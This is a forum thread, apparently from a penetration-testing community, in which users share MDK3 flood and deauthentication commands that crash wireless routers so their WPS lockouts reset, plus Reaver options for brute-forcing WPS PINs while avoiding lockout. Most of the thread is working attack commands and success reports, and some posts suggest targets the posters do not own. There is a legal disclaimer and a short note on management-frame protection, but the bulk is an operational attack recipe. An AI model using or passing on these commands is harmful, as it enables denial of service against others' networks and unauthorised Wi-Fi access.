Page 1 of 4 1234 LastLast
Results 1 to 50 of 161

Thread: MDK3 Secret Destruction Mode

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    How to Reset WPS Lockouts Using MDK3

    Use at your own risk! Section 638:17 of the New Hampshire House Bill 495 highlights United States rules against wireless hacking. Attempting to and or gaining access to a network that you do not own or have permission to is STRICTLY forbidden. I am NOT responsible for ANYTHING you do with this information.

    The purpose of this guide is to inform users about how a router can be exploited to temporarily reset WPS lockouts. This can be useful when using reaver to crack a WPS pin. Keep in mind that this does not work with every router. It largely depends on hardware. This attack uses MDK3, a set of tools by ASPj to overload the target AP with useless data, thus causing it to freeze and reset. Here is how it works. (Each of these commands are run in a separate terminal window) and I think you can figure out the variables here.

    Code:
    mdk3 monX a -a xx:xx:xx:xx:xx:xx -m
    This floods the target AP with fake clients.

    Code:
    mdk3 monX m -t xx:xx:xx:xx:xx:xx
    This causes Michael failure, stopping all wireless traffic. However, this only works if the target AP supports TKIP. (Can be AES+TKIP)

    Code:
    mdk3 monX d -b blacklist -c X
    This keeps a continuous deauth on the network. If this attack does not start, make a blank text document in your root folder named blacklist. Leave it empty as MDK3 automatically populates the list.

    Code:
    mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X
    This floods a bunch of fake APs to any clients in range (only effective to windows clients and maybe some other devices, Macs are protected against this).

    You will know when the AP has reset either by checking with

    Code:
    wash -i monX -C
    or if the target shows channel -1 and MB shows -1 in airodump.

    Please do NOT use this on a network that is not yours or that you do not have permission to. If the owner finds out that it is you who is attacking their network, you may end up in serious legal trouble.

    Visit ASPj's site as mentioned above for more information.

    Preventing the attack

    As of now, there is no way to prevent the attack except by disabling wireless, buying a high end router, or getting an AP that encrypts management packets. Deauthentication packets are management frames which are sent UNENCRYPTED unless you purchase an AP that supports MFP. You can read more about this here.

    Downloads for useful programs: I will do my best to keep these updated

    Atrophy

    ReVdk3-r1

    FrankenScript 2
    Last edited by soxrok2212; 2014-07-14 at 12:26.

  2. #2
    Join Date
    2013-Jul
    Posts
    844
    This is great!!! we have been looking for a way to reset WPS locked routers remotely and our team will be happy to write a script for you however a few questions.

    1. You are running the mdk3 a b d and m command lines in four different windows all at the same time - is this correct?

    2. Your comment "You can also add -m to the end of this so it uses real mac addresses instead of 00:00:00:00:00:00."

    Does that deal with the "a" attack above OR the "d" attack below

    This should be easy to write just airodump-ng and four Eterm terminal windows. We already have a DDOS program written to use with pwnstar that runs the a and g and airodump-ng commands. We will drop all our other projects with easy-cred and focus on this. However be aware that a reset WPS router is only going to give you ten keys before it locks up. Anyway we will run some tests and have something back to you in a few weeks. Anything this is better then trying to brute force a long key.

    Again THANKS!!!!!

    Musket Team Alpha

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    1- Yes, ultimately you should have a total of 5 windows open at the same time:
    1- airodump
    2- mdk3 a
    3- mdk3 b
    4- mdk3 d
    5- mdk3 m

    2- You can add -m after mdk3 a. This will authenticate real mac addresses instead of 00:00:00:00:00:00. HOWEVER, with my Alfa AWUS036H, airodump stops working unless I close the teminal window and rerun the command.

    *I updated the tutorial to hopefully solve future questions*

    I could also do some testing with you after you guys push out this tool; I'm excited to see what we can do!
    Last edited by soxrok2212; 2013-12-07 at 14:48.

  4. #4
    Join Date
    2013-Jul
    Posts
    844
    Reference your comment about airodump-ng we know there is an issue with airodump-ng in a kali-linux install as airodump-ng will freeze randomly in all our computers occassionally. But the issue is so random we do not know how to even approach the problem.

    WE will send you a working copy so you can check the command lines and make suggestions. WE ran some tests yesterday but they were inconclusive as it was against a CCMP encrypted router.

  5. #5
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    If you would like to send me what you have now, I can run some tests against TKIP...
    Last edited by soxrok2212; 2013-12-09 at 20:35.

  6. #6
    Join Date
    2013-Jul
    Posts
    844
    We do not see a way to send you the script. We do not want to post an incompleted script for general use.

  7. #7
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212

    The mdk3 part of the script is completed and ready for you to test and correct. We have run it against CCMP WPS locked routers. We first turned on the WPS locking by requesting pins. After ten pins recieved the router locked. We then gave the router a quad blast with mdk3 in four Eterm windows as you suggested. It seems to freeze the router BUT if it reset, the WPS locking did not reset with the router. We know that after a power failure all the WPS locking resets to off in our area.

    The airodump-ng problem seems to be related to computer speed. On the same computer using HD install of kali-linux, airodump-ng would freeze within a minute or two. If reset it would run and then eventually freeze again. With a 16gb usb persistent install of kali-linux airodump-ng froze within seconds.

    Your comments concerning the -r command may have merit BUT against the routers in our areas of operation time between pin request and mac codes requesting these pins has no relationship to the locking. The locking occurs after ten successful pin requests from any source.

    The varmacreaver.sh program available for download in these forums was originally developed to explore time between pin request versus mac codes requesting said pins. We explored this approach extensively. However our targets are only one make of router. The program sat on the shelf for six month until we discovered a use for it.

    MTA/MTB

  8. #8
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    To soxrok2212

    The mdk3 part of the script is completed and ready for you to test and correct. We have run it against CCMP WPS locked routers. We first turned on the WPS locking by requesting pins. After ten pins recieved the router locked. We then gave the router a quad blast with mdk3 in four Eterm windows as you suggested. It seems to freeze the router BUT if it reset, the WPS locking did not reset with the router. We know that after a power failure all the WPS locking resets to off in our area.

    The airodump-ng problem seems to be related to computer speed. On the same computer using HD install of kali-linux, airodump-ng would freeze within a minute or two. If reset it would run and then eventually freeze again. With a 16gb usb persistent install of kali-linux airodump-ng froze within seconds.

    Your comments concerning the -r command may have merit BUT against the routers in our areas of operation time between pin request and mac codes requesting these pins has no relationship to the locking. The locking occurs after ten successful pin requests from any source.

    The varmacreaver.sh program available for download in these forums was originally developed to explore time between pin request versus mac codes requesting said pins. We explored this approach extensively. However our targets are only one make of router. The program sat on the shelf for six month until we discovered a use for it.

    MTA/MTB
    Ok, send me a private message sometime and I'll give you an email to send the beta to. Good work by the way and I'll do some testing.

  9. #9
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212
    We have spent two hours trying to send you the link where you can access the file. We have given up. We keep getting error messages. Maybe if you send me a message I can reply back to you with the link.

  10. #10
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    To soxrok2212
    We have spent two hours trying to send you the link where you can access the file. We have given up. We keep getting error messages. Maybe if you send me a message I can reply back to you with the link.
    Heres my old e-mail: [email protected]

    You can send it there if you'd like.

    *I don't care if it gets spammed because I don't use it*
    Last edited by soxrok2212; 2013-12-11 at 15:42.

  11. #11
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Awesome work on the script! I've got some work to do tonight, but I'll do some testing tomorrow! Looks great!

  12. #12
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Just did some testing... here are some notes:

    Bugs
    -Airodump does not correctly display networks… I only see the network (which its really not picking up any beacons) when I auth

    Questions
    -When the mac address is changed, does it change mon0 mac address also?

    Suggested Features
    -Implementation with reaver and auto detection of locks requiring reboot (or that may take hours at a time) to have it do this all automatically. (This can come later)

    -Automatic network discovery, ex: how wifite allows users to chose networks and input the mac address and channel automatically by choosing 1,2,3 etc as the number of the network.

    -Stop the attacks after term windows are shut, then automatically disconnect and reconnect adapter (don't know if this is possible due to whether the card is USB or built in etc).

    -Enter a number to select which interface to put into monitor mode (helps for beginners) and which to use for the actual attack.

    -Make Beacon flood and Deauth optional.... have the script check for clients before the attack.

    Changes
    -Changed a few words around.

    -Removed -c option from deauth.

    Other

    Where can we share updated scripts for this? (Don't start any changes before you get my updated copy)

    Looks good so far!... other than a few bugs!
    Last edited by soxrok2212; 2013-12-12 at 23:53.

  13. #13
    Join Date
    2013-Jul
    Posts
    844
    You can send it to my e-mail. Or read my mail I outline another quicker way of sending it to me.

    1. We will do nothing till we recieve your edited version.
    2. Making Beacon flood optional will only take us five minutes.
    3 The mon0 mac address will change BUT we will test this again in our lab to confirm.
    4 The implimentation of reaver into the program will only be done once you prove that you can reset the router and the WPS pin settings are reset as a result. As mentioned routers in our area that are WPS locked do not unlock the WPS system and/or we cannot reset the router? If you see one router reset its WPS system after using routerreset.sh tell us and we will outline what we need from you to test further.
    5. On shutting down the Eterm windows. The script file terminal window stays live in the background after loading all Eterms. When you are ready to shut down the Eterm windows you can go to that terminal window and follow the instructions. We are working on why the program continues to send beacon flood after you shut it down. But right now you have to unplug the reciever. We ran into this with varmacreaver.sh so I think we might be able to master that?

    5. -Automatic network discovery - Sorry we do not understand
    6. -Enter a number to select which interface - Note programmers 10 times better then us like the writers of pwnstar9.0 leave this input as a manual keyboard entry. We have seen attempts to automate the process. Weakenet Labs has a few routines but there are always glitches. Since the mon0 entry is so critical we think manual entry is better. We might look into some error handling routines.
    7. Finnally airodump-ng. We will look into this we did not see any problems except that airodump-ng froze. As a matter of interest have you updated your aircrack-ng. There is a new version as of around 1 Dec 2013. Try apt-get install aircrack-ng

  14. #14
    Join Date
    2013-Jul
    Posts
    844
    1. We have solved the airodump-ng freezing problem by adjusting mdk3 command lines.
    2. We have written routines to clear everything on shutdown.
    3. We added a routines to select Beacon Flood Mode
    4. We added a routine to add WPA downgrade if Beacon Flood was not used
    Program no longer hangs ran it for an hour airodump-ng ran smoothly

  15. #15
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Ok, I'll send you an updated copy... I put a random name for the project... let me know if you like it.

    Yes, I have updated aircrack-ng to 1.2. When airodump is running, I don't get any beacons from the router so it shows the channel and MB as -1, along with the SSID as <length=0>. I unplugged the adapter and ran the commands manually and it worked so I'm sure its just a small bug somewhere.

    *WPA downgrade simply sends deauth packets to the AP to see if the admin will try changing the security... it's essentially the same thing as aireplay-ng deauthing or mdk3 d*

    Also, what I mean by auto network discovery is have the script run airodump to find all networks in the area, and then assign them to a number so the user can simply type in the corresponding number to automatically put in the mac address and channel.
    Last edited by soxrok2212; 2013-12-13 at 20:07.

  16. #16
    Join Date
    2013-Dec
    Posts
    7
    This is exactly what i was looking.for....i have one minor issue how ever....the router i am dealing with is wpa2-psk how would i go about crashing that?

  17. #17
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by korn16ftl3 View Post
    This is exactly what i was looking.for....i have one minor issue how ever....the router i am dealing with is wpa2-psk how would i go about crashing that?
    Your best bet would be to use the authentication flood and let it run for a fair amount of time. The beacon flood may also be helpful if there are clients along with a constant deauth.

  18. #18
    Join Date
    2013-Dec
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Your best bet would be to use the authentication flood and let it run for a fair amount of time. The beacon flood may also be helpful if there are clients along with a constant deauth.
    so as a note to share....i followed this step by step on a WPA2-PSK belkin router it didnt reboot the router but it did how ever cause it to aparently panic because of the attack and switch channels?

  19. #19
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by korn16ftl3 View Post
    so as a note to share....i followed this step by step on a WPA2-PSK belkin router it didnt reboot the router but it did how ever cause it to aparently panic because of the attack and switch channels?
    Did you verify this with wash?

  20. #20
    Join Date
    2013-Dec
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Did you verify this with wash?
    yes and it was locked and on channel 1 before I Dos'd the **** out of it about 3 hours later i ran airmon-ng to see if the AP was still there or if any thing had changed and it was on channel 11 ran wash -i wlan0 and it was unlocked once again

    EDIT ADDITIONAL INFORMATION TO ADD:

    so today i was in wal-mart looking at routers i looked at a belkin N300 and looked at the back (this is a lower end blekin model router) and noticed it had a "self heal" feature to detect issues and apparently resolve them. My theory is that if lower end Belkin routers have a "self heal" feature so must the higher end routers and that it was this feature that 1) switched channels when i flooded the router using the attack mentioned in the OP and 2) in the process of changing channels also reset the WPS lock as either part of the channel changing process or as part of the "self heal" feature of the router.

    Any thoughts or feed back on this concept?

    It would be really interesting to have some thing written up that once the WPS lock takes place u can press a key combination to switch to a Dos attack to flood the AP and cause it to "self heal", or reaver is open source last i check have an add'd option to Dos every 10 pin attempts as it was previously mentioned routers will WPS lock after 10 failed WPS attempts
    Last edited by korn16ftl3; 2013-12-20 at 18:54.

  21. #21
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Belkin's self heal feature simply scans for all nearby APs and changes the channel once a week to minimize interference, along with clearing the routing tables. What is the model of the router you are attempting to take down?

  22. #22
    Join Date
    2013-Dec
    Posts
    7
    [QUOTE=soxrok2212;29496What is the model of the router you are attempting to take down?[/QUOTE]

    that im not sure of, it was a badly abused router, all the labels peeled off and cracked housing, it just happened to work or seem to work so i decided to learn some pen testing as it was something that i have always had an intrest in. I have played with WEP a little but never WPA/WPA2 so i decided to learn something new.

  23. #23
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Can you log into the router's web interface? The model number should be on the first page.

  24. #24
    Join Date
    2013-Dec
    Posts
    5
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airdoump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a seperate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.

  25. #25
    Join Date
    2013-Dec
    Posts
    5
    To edit the previous post;

    The number of packets per second sent by mdk3 m ranged from 2 per second to about 70 per second.

  26. #26
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by bad_bobby View Post
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airdoump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a seperate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.
    Did you replace 11:22:33:44:55:66 with the router's mac address?

  27. #27
    Join Date
    2013-Dec
    Posts
    5
    Quote Originally Posted by soxrok2212 View Post
    Did you replace 11:22:33:44:55:66 with the router's mac address?
    Yes, I just put the fake MAC for privacy purposes.

    Also, in the second window I used the 'm' command while simultaneously running the 'a' command.

    (I missed out the 'm' in the previous post).

  28. #28
    Join Date
    2013-Dec
    Posts
    5
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.

  29. #29
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by bad_bobby View Post
    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.
    I usually run reaver like this:

    Code:
    reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv -a -S -N -E
    Sometimes, (like I said earlier), add this to the end:

    Code:
    -r x:y
    Where x= number of attempts and y= delay after x number of attempts, so -r 2:300 would try 2 pins every 5 minutes.

    The other variables in the command mean this:

    -a Auto select some advanced features.

    -S Use small diffleman attacks (reduces strain on the router).

    -N No nacks, just speeds things up a bit.

    -E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

    Other than this, there is really no way to prevent the locks.
    Last edited by soxrok2212; 2013-12-27 at 22:28.

  30. #30
    Join Date
    2013-Nov
    Posts
    24
    Quote Originally Posted by bad_bobby View Post
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airdoump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a seperate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.

    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened....but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though...would be cool if the former was true though!
    Visit my blog! PenTesting for Amateurs, by Amateurs -- Request your own tutorial, or send one to me to post.
    "thevanoutside" a Wordpress Blog!

  31. #31
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by polyphemus View Post
    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened....but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though...would be cool if the former was true though!
    Yeah, they are higher end routers, I have one too, a V1 and V2 and only crashed the V1 within a reasonable amount of time. It really depends on the hardware. Glad to see it worked though!

  32. #32
    Join Date
    2013-Dec
    Posts
    11

    Talking

    Quote Originally Posted by bad_bobby View Post
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.
    same situation here, authentication flood alone does nothing, but combined with -b, -d, -m commands breaked the router in a few minutes, and unlocked them

  33. #33
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by VinnyG View Post
    same situation here, authentication flood alone does nothing, but combined with -b, -d, -m commands breaked the router in a few minutes, and unlocked them
    Glad to know it worked!

  34. #34
    Join Date
    2013-Jul
    Posts
    844
    To soxrox

    We have had success with a new WPA2 CCMP router in our surrounding wifi mix. We used mdk3 a g d m (we did not use beaconflood mode.) The mdk3 alpha mode would run up to approx 11000 and rest. We thought this was the fault of mdk3 gama and turned it off BUT what was actually occuring was the router was resetting. We then ran wash from a terminal window and the WPS was open. Reseting the router took about a minute or two. So THIS DEFINITELY WORKS on a router to router basis. We will send you router mac code data by e-mail. We used a slightly rewritten version6 which we call version6a and left the -m code in and just let airodump-ng freeze then removed it manually during the attack.

  35. #35
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.

  36. #36
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by soxrok2212 View Post
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.
    Is there any way I/someone can test the current script you have atm? im not good with coding but i do have a few routers i could use it on.
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  37. #37
    Join Date
    2013-Nov
    Location
    the state of oppression
    Posts
    16
    sounds like a useful script imo

  38. #38
    Join Date
    2013-Nov
    Location
    the state of oppression
    Posts
    16
    does anyone have any recommendations for quality WPS enabled routers? I have a d link without WPS and have nothing to test on.

  39. #39
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.
    Sounds good, I'm very interested to see it and test it out.
    I can't script to save my life lol, saying that though I've managed to put together my first ever script, It took me ages and nearly cost me all my hair! LOL

    Keep up the great work guys.

  40. #40
    Join Date
    2014-Jan
    Posts
    2
    I found a interesting bash script called TimedReaver.sh that combining mdk3 and reaver (aireplay-ng) in a time intervalled loop. Check here http://moppleit.dk/ScriptsCodes.aspx Please tell if work for someone.

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    We looked at the script. It uses mdk3 alpha against the router only. If you use it do not try and spoof your mac with this program. Reaver requires different mac spoof handling.

  42. #42
    It is great and useful!

  43. #43
    Join Date
    2013-Mar
    Location
    where you can hear the silence
    Posts
    6

    BTHub3 router

    Quote Originally Posted by bad_bobby View Post
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airdoump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a seperate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.
    bad_bobby I have successfully reset BTHub3 router last year with the only command mdk3 mon0 a -a XX:XX:XX:XX:XX:XX just make sure you are close enough to your router, otherwise it won't work my friend, it has to be -50 and down, so -40 is better then -50 or 60, the closer you are the better luck of success.

  44. #44
    Join Date
    2014-Jan
    Posts
    7
    Well I'm using the same method (mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m) ,but after 3 restarts router get freeze.Router is TP-Link model wr740n.How I can prevent this frezze?

  45. #45
    I am trying to reboot a netgear CG3101D aka VM Superhub using the commands from the 1st page without any success regardless of how many clients are connected.

    All I get is AP seems to be invulnerable - in airodump it shows only 5 clients are connected and the power fluctuates between 50 and 58.

    I have tried cracking this with wifite, reaver and bully without any success unless I specify the pin in either reaver or bully so I assumed it was locking up without reporting it.

    Anyone have any suggestions?

    Rab.

  46. #46
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by flyinghaggis View Post
    I am trying to reboot a netgear CG3101D aka VM Superhub using the commands from the 1st page without any success regardless of how many clients are connected.

    All I get is AP seems to be invulnerable - in airodump it shows only 5 clients are connected and the power fluctuates between 50 and 58.

    I have tried cracking this with wifite, reaver and bully without any success unless I specify the pin in either reaver or bully so I assumed it was locking up without reporting it.

    Anyone have any suggestions?

    Rab.
    Have you added the -m switch to mdk3 a? So

    Code:
    Mdk3 mon0 a -a 00:11:22:33:44:45 -m
    That will use real Mac addresses instead of just 00:00:00:00:00:00.

    And I assume you're running all 4 commands... Correct?

    Also, what security type is the router using?

  47. #47
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    [QUOTE=BadFollower;30067]It may actually be your card freezing from all the simultaneous commands pushing data from it. Also, the router may just be frozen and need a manual reboot.
    Last edited by soxrok2212; 2014-01-10 at 01:15.

  48. #48
    Quote Originally Posted by soxrok2212 View Post
    Have you added the -m switch to mdk3 a? So

    That will use real Mac addresses instead of just 00:00:00:00:00:00.

    And I assume you're running all 4 commands... Correct?

    Also, what security type is the router using?
    Originally, I tried this without the -m switch but when it appeared I wasn't having any luck I changed it to include the switch.

    Yes you are correct I am using all 4 commands and the router is set to wpa auto for the security and in airodump it is reported as
    WPA2 CCMP PSK.
    Reaver and bully just seem to bypass the pin (1st 4 digits) as if the router is reporting it as wrong when the opposite is correct hence my theory
    that the router is locking up without reporting it.
    Last edited by flyinghaggis; 2014-01-10 at 06:10. Reason: Security Update

  49. #49
    Join Date
    2013-Nov
    Posts
    4
    Hi!!!

    Kali 3.12

    MDK3 Dont work....

    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    AP D8:FE:E3:08:XX:XX seems to be INVULNERABLE!
    Device is still responding with 500 clients connected!
    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    AP D8:FE:E3:08:XX:XX seems to be INVULNERABLE!

    Use Alfa ....036H

    Connecting Client: 00:00:00:00:00:00 No clients to connection ...


    Who can help?

  50. #50
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I've had a Netgear router that doesn't report lockouts, but it still blocks WPS connections. If you can log into the routers webpage, 192.168.1.1 go under advanced setup, and then wireless settings, and scroll down to see if it says something like "Lock WPS after X failed attempts. If it says that its locked in the admin webpage but not in wash, it really is lock but the router just doesn't report it in its beacon frames. It could be that the router blacklists your mac address after a certain amount of pin requests, though it is HIGHLY unlikely. Try spoofing your mac address after a failed attempt and if this works, I can direct you to a program that automates this process. Good luck and I hope I made sense!

Similar Threads

  1. MDK3 on 5Ghz
    By klawil in forum General Archive
    Replies: 3
    Last Post: 2017-05-24, 11:50
  2. MDK3 problem
    By wewe73 in forum TroubleShooting Archive
    Replies: 4
    Last Post: 2015-10-26, 14:14
  3. My Secret SSH user ...
    By prompt_32 in forum How-To Archive
    Replies: 2
    Last Post: 2014-01-14, 00:51

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •